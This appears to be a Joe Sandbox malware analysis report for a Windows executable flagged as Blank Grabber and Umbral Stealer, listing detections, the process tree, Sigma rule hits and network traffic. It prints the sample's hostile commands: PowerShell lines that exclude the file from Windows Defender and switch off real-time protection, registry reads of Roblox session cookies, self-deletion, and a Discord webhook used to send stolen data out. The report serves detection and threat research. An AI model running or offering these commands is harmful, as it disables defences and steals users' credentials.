Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
zamPeEkHWr.exe

Overview

General Information

Sample name:zamPeEkHWr.exe
renamed because original name is a hash value
Original sample name:824d0e2ebaa40b7bca3bc0657338a13df78121172fe52e604f45c8033ab7537a.exe
Analysis ID:1488036
MD5:ef323a7483653ffb1fc4ff036576e065
SHA1:80e63b57a7ad6394f778c7aa5a855520f1533589
SHA256:824d0e2ebaa40b7bca3bc0657338a13df78121172fe52e604f45c8033ab7537a
Tags:exe
Infos:

Detection

Blank Grabber, Umbral Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Blank Grabber
Yara detected Umbral Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies the hosts file
Self deletion via cmd or bat file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses attrib.exe to hide files
Uses ping.exe to check the status of other devices and networks
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • zamPeEkHWr.exe (PID: 7396 cmdline: "C:\Users\user\Desktop\zamPeEkHWr.exe" MD5: EF323A7483653FFB1FC4FF036576E065)
    • WMIC.exe (PID: 7520 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 7592 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\zamPeEkHWr.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7644 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7800 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7888 cmdline: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8008 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6980 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7740 cmdline: "wmic.exe" os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 4504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 3980 cmdline: "wmic.exe" computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7736 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7672 cmdline: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 3052 cmdline: "wmic" path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 1720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6724 cmdline: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\zamPeEkHWr.exe" && pause MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 5868 cmdline: ping localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
  • cleanup

Malware Configuration

Threatname: Umbral Stealer

{"C2 url": "https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL", "Version": "v1.3"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
zamPeEkHWr.exeJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
    zamPeEkHWr.exeJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
      zamPeEkHWr.exeINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
      • 0x30fe4:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
      • 0x3116a:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
      • 0x31206:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scrJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scrJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
          C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scrINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
          • 0x30fe4:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
          • 0x3116a:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
          • 0x31206:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000000.1668669145.000001EAAE572000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000000.00000000.1668669145.000001EAAE572000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
              00000000.00000002.2336242686.000001EAB073D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                00000000.00000002.2336242686.000001EAB06A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                  Process Memory Space: zamPeEkHWr.exe PID: 7396JoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                    Click to see the 2 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    0.0.zamPeEkHWr.exe.1eaae570000.0.unpackJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                      0.0.zamPeEkHWr.exe.1eaae570000.0.unpackJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
                        0.0.zamPeEkHWr.exe.1eaae570000.0.unpackINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
                        • 0x30fe4:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
                        • 0x3116a:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
                        • 0x31206:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\zamPeEkHWr.exe", ParentImage: C:\Users\user\Desktop\zamPeEkHWr.exe, ParentProcessId: 7396, ParentProcessName: zamPeEkHWr.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe', ProcessId: 7644, ProcessName: powershell.exe
                        Sigma detected: Powershell Defender Disable Scan Feature
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\zamPeEkHWr.exe", ParentImage: C:\Users\user\Desktop\zamPeEkHWr.exe, ParentProcessId: 7396, ParentProcessName: zamPeEkHWr.exe, ProcessCommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, ProcessId: 7888, ProcessName: powershell.exe
                        Sigma detected: Suspicious Startup Folder Persistence
                        Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\zamPeEkHWr.exe, ProcessId: 7396, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\kaS9T.scr
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\zamPeEkHWr.exe", ParentImage: C:\Users\user\Desktop\zamPeEkHWr.exe, ParentProcessId: 7396, ParentProcessName: zamPeEkHWr.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe', ProcessId: 7644, ProcessName: powershell.exe
                        Sigma detected: SCR File Write Event
                        Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\zamPeEkHWr.exe, ProcessId: 7396, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\kaS9T.scr
                        Sigma detected: Startup Folder File Write
                        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\zamPeEkHWr.exe, ProcessId: 7396, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\kaS9T.scr
                        Sigma detected: Suspicious Screensaver Binary File Creation
                        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\zamPeEkHWr.exe, ProcessId: 7396, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\kaS9T.scr
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\zamPeEkHWr.exe", ParentImage: C:\Users\user\Desktop\zamPeEkHWr.exe, ParentProcessId: 7396, ParentProcessName: zamPeEkHWr.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe', ProcessId: 7644, ProcessName: powershell.exe

                        Snort Signatures

                        Suricata Signatures

                        Timestamp:2024-08-05T15:44:50.851858+0200
                        SID:2045593
                        Source Port:49740
                        Destination Port:443
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-05T15:44:27.256131+0200
                        SID:2803305
                        Source Port:49738
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Unknown Traffic

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: zamPeEkHWr.exeAvira: detected
                        Antivirus detection for dropped file
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scrAvira: detection malicious, Label: HEUR/AGEN.1307507
                        Found malware configuration
                        Source: zamPeEkHWr.exeMalware Configuration Extractor: Umbral Stealer {"C2 url": "https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL", "Version": "v1.3"}
                        Multi AV Scanner detection for dropped file
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scrReversingLabs: Detection: 81%
                        Multi AV Scanner detection for submitted file
                        Source: zamPeEkHWr.exeReversingLabs: Detection: 81%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Machine Learning detection for dropped file
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scrJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: zamPeEkHWr.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA3300D CryptUnprotectData,0_2_00007FFD9BA3300D
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA336AE CryptUnprotectData,0_2_00007FFD9BA336AE
                        Source: zamPeEkHWr.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.4:49740 version: TLS 1.2
                        Source: zamPeEkHWr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Networking

                        barindex
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL
                        Uses ping.exe to check the status of other devices and networks
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.com
                        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                        Source: Joe Sandbox ViewIP Address: 162.159.138.232 162.159.138.232
                        Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: unknownDNS query: name: ip-api.com
                        Source: unknownDNS query: name: ip-api.com
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.com
                        Source: global trafficDNS traffic detected: DNS query: ip-api.com
                        Source: global trafficDNS traffic detected: DNS query: ptb.discord.com
                        Source: unknownHTTP traffic detected: POST /api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL HTTP/1.1Accept: application/jsonUser-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17Content-Type: application/json; charset=utf-8Host: ptb.discord.comContent-Length: 940Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Aug 2024 13:44:50 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=e33ff842533011efbe60b67178f48d0e; Expires=Sat, 04-Aug-2029 13:44:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1722865492x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2%2BBBAmd1RrIzFLhMO%2FwUWja0FGraiAvZGXlrwzS2KQ53MD0Lgp4EP3CjS%2FtWQOs%2FYbSjtsPUYOKa07FSNWu1ss1eQYbjL5UQLrbSzehFLb%2FnfOo09q2D2J42vggM0O9VNQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=e33ff842533011efbe60b67178f48d0ebfbd2fc0e724b666922ca10fb71189111e3b4659a738b6f2d176e07ba6c3b9c8; Expires=Sat, 04-Aug-2029 13:44:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=2cb54a56125b2ec73133bde1a3ab9d05c16a5180-1722865490; path=/; domain=.discord.com; HttpOnly; Secure; Sam
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Aug 2024 13:44:52 GMTContent-Type: application/jsonContent-Length: 45Connection: closestrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1722865493x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RNW9pdtjvblLioLWZUfboMySiwBFgHK6dpv%2FHooofDFjLL8AKn2Af75Xn3f%2BjAbBvlW98v7%2FLlnH228kDCKSOr3cAjA%2B6wckKePXKI49EnuBYKvG4GsWJbunFkGQ6o40EQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Server: cloudflareCF-RAY: 8ae739693891c470-EWR{"message": "Unknown Webhook", "code": 10015}
                        Source: powershell.exe, 00000005.00000002.1765168613.000001D36A810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                        Source: powershell.exe, 00000005.00000002.1766639509.000001D36A990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                        Source: powershell.exe, 00000005.00000002.1767821845.000001D36AB66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoK
                        Source: zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB0357000.00000004.00000800.00020000.00000000.sdmp, zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB06A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                        Source: zamPeEkHWr.exe, kaS9T.scr.0.drString found in binary or memory: http://ip-api.com/json/?fields=225545
                        Source: zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB06A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545P
                        Source: zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB0357000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                        Source: zamPeEkHWr.exe, kaS9T.scr.0.drString found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
                        Source: powershell.exe, 00000005.00000002.1757050367.000001D310075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1894278502.000001BED4F48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1894278502.000001BED4E05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1817451274.000001BEC674A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2036403659.000001DE69631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2036403659.000001DE69767000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1925975234.000001DE5AE7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2266136040.000002492F6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2119777600.000002492100A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2266136040.000002492F805000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 00000017.00000002.2119777600.000002491F882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB07B7000.00000004.00000800.00020000.00000000.sdmp, zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB073D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ptb.discord.com
                        Source: powershell.exe, 00000005.00000002.1740029520.000001D300228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB02F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1740029520.000001D300001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1778231738.000001138001D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1817451274.000001BEC4D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1925975234.000001DE595B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2119777600.000002491F651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000005.00000002.1740029520.000001D300228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: powershell.exe, 0000000A.00000002.1817451274.000001BEC658C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1925975234.000001DE5AD47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2119777600.0000024920AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: powershell.exe, 00000017.00000002.2119777600.000002491F882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000005.00000002.1740029520.000001D300001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1778231738.000001138005E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1778231738.000001138001D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1817451274.000001BEC4D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1925975234.000001DE595B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2119777600.000002491F651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 00000017.00000002.2266136040.000002492F805000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000017.00000002.2266136040.000002492F805000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000017.00000002.2266136040.000002492F805000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
